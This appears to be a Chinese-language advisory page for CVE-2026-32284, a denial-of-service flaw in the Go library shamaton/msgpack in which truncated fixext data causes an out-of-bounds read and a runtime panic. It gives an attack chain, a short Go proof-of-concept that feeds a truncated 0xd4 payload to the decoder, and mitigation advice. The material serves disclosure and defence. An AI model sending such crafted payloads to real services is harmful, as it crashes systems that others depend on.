CVE-2026-32284 CVSS 7.5 高危

CVE-2026-32284 shamaton/msgpack越界读取拒绝服务漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32284

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

shamaton/msgpack

漏洞概述

CVE-2026-32284 是存在于 shamaton/msgpack 库中的一个安全漏洞。由于解码器在处理截断的 fixext 数据（格式代码 0xd4-0xd8）时未能正确验证输入缓冲区的长度，导致发生越界读取。攻击者可利用此漏洞触发应用程序运行时恐慌，从而造成拒绝服务攻击。

技术细节

该漏洞的根源在于 msgpack 解码器对 fixext 格式（format codes 0xd4-0xd8）的数据处理逻辑存在缺陷。当解码器解析这些特定格式代码时，预设了固定的数据长度，但未对实际接收到的输入缓冲区长度进行充分校验。攻击者可以构造包含截断 fixext 数据的恶意 msgpack 报文发送给目标服务。当解码器尝试读取不存在的后续数据字节时，会发生越界内存访问，进而触发 Go 语言的 runtime panic。由于该漏洞无需身份认证且通过网络远程触发，攻击者可轻易导致目标服务进程崩溃，严重影响系统可用性。

攻击链分析

STEP 1

攻击者识别出目标系统使用了存在漏洞的 shamaton/msgpack 库处理外部数据。

STEP 2

攻击者构造特制的 msgpack 数据包，其中包含格式代码为 0xd4-0xd8 但数据部分被恶意截断的 fixext 数据。

STEP 3

攻击者通过网络将恶意数据包发送给目标应用程序的解析接口。

STEP 4

目标应用的 msgpack 解码器在处理该数据时，因未校验缓冲区长度而发生越界读取。

STEP 5

越界读取触发 Go 运行时恐慌（runtime panic），导致服务进程崩溃，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

package main

import (
	"fmt"
	"github.com/shamaton/msgpack"
)

func main() {
	// Crafted malformed msgpack data
	// Format code 0xd4 (fixext 4) expects 1 byte type + 4 bytes data.
	// Here we provide truncated data to trigger out-of-bounds read.
	malformedData := []byte{0xd4, 0x01} 

	var result interface{}
	err := msgpack.Unmarshal(malformedData, &result)
	if err != nil {
		fmt.Println("Exploit successful, panic/error triggered:", err)
	} else {
		fmt.Println("Decoded successfully (unexpected):", result)
	}
}

影响范围

shamaton/msgpack (存在漏洞的具体版本请参考官方公告)

防御指南

临时缓解措施

建议在未升级库版本前，在应用网关或中间件层部署流量过滤规则，检测并拦截格式异常的 msgpack 数据流，或对传入的数据进行预处理以移除潜在的恶意 fixext 格式载荷。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表